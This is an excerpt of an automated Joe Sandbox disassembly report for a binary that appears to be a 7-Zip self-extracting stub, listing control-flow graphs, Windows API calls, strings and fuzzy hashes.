                                                                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                                    • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                                                    • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                                    • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                                    • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                                    • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                                    • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                                    • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                                                    • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                                                                    • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                                                                  • wsprintfW.USER32 ref: 004044A7
                                                                                                                    • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                                                  • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                                                  • String ID: 7zSfxFolder%02d$IA
                                                                                                                  • API String ID: 3387708999-1317665167
                                                                                                                  • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                                                  • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                                                                  • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                                                  • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 924 408f26 923->924 925 408f19-408f24 923->925 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 924->927 925->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 945 409199-4091b0 935->945 946 409019-40901c 935->946 939 409020-409035 call 40e8da call 40874d 936->939 966 408fb0-408fb2 937->966 967 408fb6-408fbb 937->967 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 945->952 953 40934c-409367 call 4087ea 945->953 946->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 968 4090ad-4090b3 955->968 969 40907f 955->969 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 964 409051-409061 call 408726 958->964 959->964 988 409063-409066 964->988 989 409068 964->989 966->967 970 408fc3-408fcf 967->970 971 408fbd-408fbf 967->971 981 409187-409196 call 408e83 968->981 982 4090b9-4090d9 call 40d94b 968->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 969->977 970->922 970->923 971->970 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->968 1016 409261-409264 978->1016 1017 4092c9 978->1017 986 4091f7-409209 979->986 987 4092b9-4092bb 979->987 981->945 993 4090de-4090e6 982->993 1002 4093a4-4093b8 call 408761 983->1002 1003 4093ba-4093d6 983->1003 1014 409293-409295 986->1014 1015 40920f-409211 986->1015 1004 4092bf-4092c4 987->1004 996 40906a 988->996 989->996 1000 409283-409288 993->1000 1001 4090ec-4090f3 993->1001 996->955 1012 409290 1000->1012 1013 40928a-40928c 1000->1013 1008 409121-409124 1001->1008 1009 4090f5-4090f9 1001->1009 1002->1003 1080 4093d7 call 40ce70 1003->1080 1081 4093d7 call 40f160 1003->1081 1004->977 1022 4092b2-4092b7 1008->1022 1023 40912a-409138 call 408726 1008->1023 1009->1008 1018 4090fb-4090fe 1009->1018 1012->1014 1013->1012 1025 409297-409299 1014->1025 1026 40929d-4092a0 1014->1026 1015->978 1024 409213-409215 1015->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->987 1022->1004 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1050 409281 1027->1050 1028->1046 1051 409114-40911f call 40d6cb 1028->1051 1029->1004 1034 4092ac-4092ae 1029->1034 1037 4092d4-4092e0 call 408a55 1030->1037 1038 40931d-409346 call 40e959 * 2 1030->1038 1034->1022 1057 4092e2-4092ec 1037->1057 1058 4092ee-4092fa call 408aa0 1037->1058 1038->953 1038->957 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1050->1030 1051->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1066 409165-409167 1060->1066 1067 40916b-409170 1060->1067 1063->1037 1063->1038 1066->1067 1071 409172-409174 1067->1071 1072 409178-409181 1067->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@
                                                                                                                  • String ID: IA$IA
                                                                                                                  • API String ID: 1033339047-1400641299
                                                                                                                  • Opcode ID: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                                                                                                  • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                                                                  • Opcode Fuzzy Hash: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                                                                                                  • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID: $KA$4KA$HKA$\KA
                                                                                                                  • API String ID: 1294909896-3316857779
                                                                                                                  • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                                                  • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                                                                  • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                                                  • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1121 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1121 1122 40983c-409846 call 409425 1112->1122 1113->1114 1115 409780-409796 call 4094e0 call 40969d call 40e959 1114->1115 1116 4097a3-4097a8 1114->1116 1137 40979b-4097a1 1115->1137 1119 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1116->1119 1120 4097aa-4097b4 1116->1120 1125 4097f3-409809 1119->1125 1120->1119 1120->1125 1133 409881-40989a call 4010e2 call 40eb24 1121->1133 1134 409878-40987f call 40ebf7 1121->1134 1144 40984a-40984c 1122->1144 1130 40980c-409814 1125->1130 1136 409816-409825 call 409403 1130->1136 1130->1137 1154 40989d-4098c0 call 40eb19 1133->1154 1134->1133 1136->1130 1137->1109 1144->1110 1157 4098c2-4098c7 1154->1157 1158 4098f6-4098f9 1154->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1164 409954 1159->1164 1165 40994b-409952 call 409c13 1159->1165 1166 409902-409904 1160->1166 1167 409908-40991e call 409530 call 409425 1160->1167 1161->1162 1180 4098e9-4098eb 1162->1180 1181 4098ef-4098f1 1162->1181 1170 409956-40996d call 4010e2 1164->1170 1165->1170 1166->1167 1167->1159 1182 40997b-4099a0 call 409fb4 1170->1182 1183 40996f-409978 1170->1183 1180->1181 1181->1110 1186 4099a2-4099a7 1182->1186 1187 4099e3-4099e6 1182->1187 1183->1182 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1154 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1226 409aa2-409aa4 1213->1226 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1223 409a73-409a75 1218->1223 1224 409a79-409a91 call 409530 call 409425 1218->1224 1219->1213 1220->1195 1221 409adf-409ae5 1220->1221 1221->1195 1223->1224 1224->1144 1233 409a97-409a9d 1224->1233 1229 409aa6-409aa8 1226->1229 1230 409aac-409ab0 1226->1230 1229->1230 1230->1195 1233->1144
                                                                                                                  APIs
                                                                                                                  • _EH_prolog.MSVCRT ref: 004096D0
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                                                                    • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$H_prolog
                                                                                                                  • String ID: HIA
                                                                                                                  • API String ID: 3431946709-2712174624
                                                                                                                  • Opcode ID: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                                                                                                  • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                                                                  • Opcode Fuzzy Hash: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                                                                                                  • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                                                  • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                                                  • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                                                  • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlenmemcmp$memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3251180759-0
                                                                                                                  • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                                                  • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                                                                  • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                                                  • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                                                                                                  APIs
                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                                                                    • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                                    • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                                    • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                                    • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                                    • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 359084233-0
                                                                                                                  • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                                                  • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                                                                  • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                                                  • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                                                                  • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 635176117-0
                                                                                                                  • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                                                  • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                                                                  • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                                                  • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000011,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@
                                                                                                                  • String ID: ExecuteFile
                                                                                                                  • API String ID: 1033339047-323923146
                                                                                                                  • Opcode ID: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                                                                                                  • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                                                                  • Opcode Fuzzy Hash: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                                                                                                  • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                                  • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
